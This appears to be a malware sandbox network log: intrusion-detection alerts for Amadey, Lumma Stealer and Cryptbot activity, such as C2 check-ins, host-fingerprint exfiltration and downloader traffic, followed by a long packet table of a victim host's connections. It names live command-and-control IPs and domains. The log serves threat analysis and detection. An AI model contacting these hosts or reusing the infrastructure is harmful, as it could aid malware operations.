                                                                                                                                                              2024-12-18T11:47:23.585529+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.649796TCP
                                                                                                                                                              2024-12-18T11:47:25.561620+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649833185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:47:27.141306+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64983731.41.244.1180TCP
                                                                                                                                                              2024-12-18T11:47:34.121562+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649855185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:47:35.564160+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64985931.41.244.1180TCP
                                                                                                                                                              2024-12-18T11:47:41.096117+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6648821.1.1.153UDP
                                                                                                                                                              2024-12-18T11:47:41.298783+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649873185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:47:41.406695+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6624461.1.1.153UDP
                                                                                                                                                              2024-12-18T11:47:42.741192+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64987831.41.244.1180TCP
                                                                                                                                                              2024-12-18T11:47:42.965417+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649880104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:42.965417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649880104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:44.030488+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649880104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:44.030488+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649880104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:45.055165+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649886104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:45.055165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649886104.21.64.80443TCP
                                                                                                                                                              2024-12-18T11:47:53.569167+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649906185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:47:55.009611+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64991031.41.244.1180TCP
                                                                                                                                                              2024-12-18T11:48:01.745121+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649925185.215.113.4380TCP
                                                                                                                                                              2024-12-18T11:48:02.940606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649930172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:05.383827+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649930172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:05.383827+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649930172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:06.653481+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649941172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:08.807533+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649941172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:08.807533+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649941172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:11.062331+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649955172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:15.445209+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649967172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:19.322382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649978172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:23.127805+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649990172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:26.874139+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.649999185.185.71.17080TCP
                                                                                                                                                              2024-12-18T11:48:26.984380+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650000172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:27.391090+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.650000172.67.209.202443TCP
                                                                                                                                                              2024-12-18T11:48:29.202502+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.650010185.185.71.17080TCP
                                                                                                                                                              2024-12-18T11:48:38.006384+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.650031185.185.71.17080TCP
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Dec 18, 2024 11:47:05.547252893 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:05.666953087 CET8049789185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:05.667081118 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:05.667301893 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:05.786834002 CET8049789185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:06.994314909 CET8049789185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:06.998233080 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.508544922 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.508955956 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.629224062 CET8049789185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:08.629281044 CET8049796185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:08.629390001 CET4978980192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.629398108 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.629635096 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:08.750358105 CET8049796185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:11.859625101 CET8049796185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:11.859751940 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:11.863894939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:11.983902931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:11.984049082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:12.063829899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:12.183435917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770374060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770423889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770458937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770477057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.770509005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.770659924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770677090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770690918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.770693064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.770718098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.770736933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.771532059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.771562099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.771578074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.771591902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.771608114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.771620035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.771859884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.771891117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.890094042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.890185118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.890229940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.890278101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.894279957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.894330978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.894360065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.894395113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.980154037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:13.980232954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.033148050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.033273935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.033457041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.033508062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.037498951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.037564993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.037606001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.037628889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.044579983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.044611931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.044655085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.044688940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.052756071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.052810907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.052987099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.053030968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.059839964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.059906006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.059940100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.059979916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.067440033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.067502975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.067580938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.067624092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.075073004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.075136900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.075156927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.075193882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.083090067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.083134890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.083261967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.083295107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.090387106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.090435982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.090518951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.090559959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.098349094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.098396063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.098478079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.098520994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.105812073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.105881929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.105904102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.105954885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.113190889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.113255978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.228600979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.228653908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.228715897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.228755951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.234028101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.234061003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.234100103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.234123945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.235872984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.235924959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.235965967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.236005068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.239937067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.240000963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.240050077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.240088940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.243942022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.244010925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.244050980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.244136095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.248047113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.248110056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.248147964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.248207092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.252227068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.252252102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.252275944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.252300024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.256208897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.256258011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.256325006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.256550074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.260191917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.260268927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.260291100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.260338068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.264257908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.264317989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.264386892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.264429092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.268378019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.268439054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.268450975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.268488884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.272409916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.272465944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.272484064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.272516966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.276506901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.276567936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.276604891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.276643038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.280441999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.280499935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.280563116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.280616045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.284554005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.284606934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.284641027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.284683943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.288656950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.288712025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.288754940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.288798094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.293657064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.293720961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.293804884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.293848038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.297374010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.297432899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.297513962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.297559023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.301031113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.301085949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.301126003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.301177025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.304879904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.304892063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.304924965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.304964066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.308826923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.308887005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.308937073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.308975935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.312961102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.313036919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.313055992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.313090086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.348355055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.348421097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.348433971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.348486900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.350460052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.350511074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.419924021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.419997931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.420047045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.420074940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.421628952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.421689987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.425028086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.425097942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.425117016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.425173998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.426652908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.426714897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.426805973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.426855087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.430017948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.430085897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.430140972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.430181980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.433348894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.433442116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.433455944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.433501959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.436723948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.436817884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.436830044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.436920881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.440005064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.440045118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.440079927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.440099955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.443254948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.443295002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.443320990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.443346024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.446533918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.446620941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.446671009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.446717978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.449565887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.449623108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.449630976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.449676991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.452672005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.452761889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.452765942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.452805042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.455885887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.455971003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.456047058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.456099987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.459871054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.459886074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.459958076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.462305069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.462378025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.462452888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.462500095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.465547085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.465585947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.465653896 CET4980680192.168.2.631.41.244.11
